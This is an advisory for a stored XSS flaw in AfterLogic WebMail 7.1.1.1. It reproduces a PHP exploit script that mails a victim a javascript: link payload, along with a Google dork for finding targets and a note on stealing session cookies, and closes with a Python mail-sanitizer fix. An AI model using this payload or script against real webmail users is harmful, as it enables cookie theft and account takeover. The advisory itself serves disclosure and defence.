Affected Systems:
AfterLogic WebMail Lite 7.1.1.1
Description:
--------------------------------------------------------------------------------
AfterLogic WebMail Lite is a fast and easy-to-use webmail frontend that supports POP3/IMAP accounts, SMTP and SSL (including Gmail).
AfterLogic WebMail Lite and WebMail Pro 7.1.1.1 and other versions do not properly filter the mail subject, which allows remote attackers to inject arbitrary HTML and script code and then execute it in the user's browser session.
Source: Saeed reza Zamanian
Link: http://secunia.com/advisories/56547/
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
<?php
/*
# Exploit Title: AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS
# Google Dork: intext:"AfterLogic" intext:"Login Information" inurl:index.php
# Date: 19 Jan 2014
# Exploit Author: Saeed reza Zamanian [s.zamanian [AT] imenantivirus.com]
# Vendor Homepage: http://www.afterlogic.com/
# Software Link: http://www.afterlogic.com/download/webmail-pro
# Version: <= 7.1.1.1
# Tested on: KALI Linux 1.0.5 (Debian) Apache/2.2.22
# CVE: vendor id = 6423

Greetz: H.Zamanian, K.Random, K.Khani

WebApp Description:
AfterLogic WebMail is a browser-based e-mail and collaboration front end,
designed to work with your existing messaging solutions. From an administrator's
perspective, the application is easy to install on your own server, easy to integrate and
easy to maintain.

Vulnerability Description:
XSS code can be stored in the e-mail body.
So you can send an e-mail to the victim with the payload below and steal the victim's cookie.

<a href=javaScRipt:alert(document.cookie)>Click Me, Please...</a>\r\n

NOTE: javascript html char encode = javaScRipt

Then you will be able to get into the victim's mailbox via the URL:
http://[WebSite]/[AfterLogic]/Default.aspx

# The PHPMailer class is required by the exploit, so download it here and run the exploit from the phpmailer directory:
http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list
*/

echo "<title>AfterLogic Pro and Lite <= 7.1.1.1 XSS Exploit</title>";
require_once('class.phpmailer.php');

$mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch
$mail->IsSMTP();             // telling the class to use SMTP

/* SETTINGS */
$smtp_user = "username";          // Any valid smtp account
$smtp_pass = "password";          // Your PASSWORD
$smtp_port = "25";                // smtp port, default: 25
$smtp_host = "localhost";         // Any valid smtp server
$from      = "attacker@email.com"; // Any email
$victim    = "victim@email.com";   // Victim email on AfterLogic WebMail
$subject   = "Salam";              // Subject

/* Body Text (double quotes so \r\n is a real CRLF, not the two literal characters) */
$body = "<a href=javaScRipt:alert(document.cookie)>Click Me, Please...</a>\r\n";

try {
    $mail->SMTPDebug = 2;     // enables SMTP debug information (for testing)
    $mail->SMTPAuth  = false; // SMTP authentication disabled; set to true to use $smtp_user / $smtp_pass
    $mail->Host      = $smtp_host;
    $mail->Port      = $smtp_port;
    $mail->Username  = $smtp_user; // SMTP account username
    $mail->Password  = $smtp_pass; // SMTP account password
    $mail->SetFrom($from, 'attacker');
    $mail->AddReplyTo($from, 'attacker');
    $mail->AddAddress($victim, 'victim');
    $mail->Subject = $subject;
    $mail->MsgHTML($body);
    $mail->Send();
    echo "Message Sent OK</p>\n";
} catch (phpmailerException $e) {
    echo $e->errorMessage();
} catch (Exception $e) {
    echo $e->getMessage();
}
?>
</body>
</html>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
AfterLogic
----------
Currently, the vendor does not provide a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:
http://www.afterlogic.com/download/webmail-pro
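Since no vendor fix is listed, the following added example (not the vendor's or the exploit author's code, written in Python so it runs stand-alone) shows the server-side handling that would have neutralised the payload above: the mail body is re-serialised through a tag/attribute allow-list, each href is reduced to a normalised scheme before it is checked (so the mixed-case javaScRipt: trick from the exploit note, entity-encoded or whitespace-split variants are all caught), and the subject is escaped as plain text. The allow-list contents are an assumption for the example.

```python
import html
import re
from html.parser import HTMLParser

# Allow-list used when rendering mail HTML (assumed for this example).
ALLOWED_TAGS = {"a", "b", "i", "p", "br", "div", "span", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "span": {"title"}}
SAFE_SCHEMES = {"http", "https", "mailto"}

def safe_url(value):
    """Return the URL if its scheme is allowed, else None. Normalise first
    (decode entities, drop control chars/whitespace, lowercase) so 'javaScRipt:'
    or 'java\\tscript:' cannot slip past a literal match for 'javascript:'."""
    raw = html.unescape(value or "")
    stripped = re.sub(r"[\x00-\x20\x7f]", "", raw)
    scheme, sep, _ = stripped.partition(":")
    if not sep:  # no scheme at all: a relative link, allowed as-is
        return raw.strip()
    return raw.strip() if scheme.lower() in SAFE_SCHEMES else None

class MailHtmlSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag (script, img, iframe, ...) is dropped entirely
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops every on* handler, style, src, ...
            if name == "href" and (value := safe_url(value)) is None:
                continue  # dangerous scheme: drop the attribute, keep the tag
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))  # text is always escaped

def sanitize_mail_html(body):
    p = MailHtmlSanitizer()
    p.feed(body)
    p.close()
    return "".join(p.out)

def render_subject(subject):
    """Subjects are plain text: escape them, never interpolate raw into HTML."""
    return html.escape(subject, quote=True)
```

Fed the exploit's body, sanitize_mail_html() keeps the link text but strips the href, so nothing executes when the message is opened.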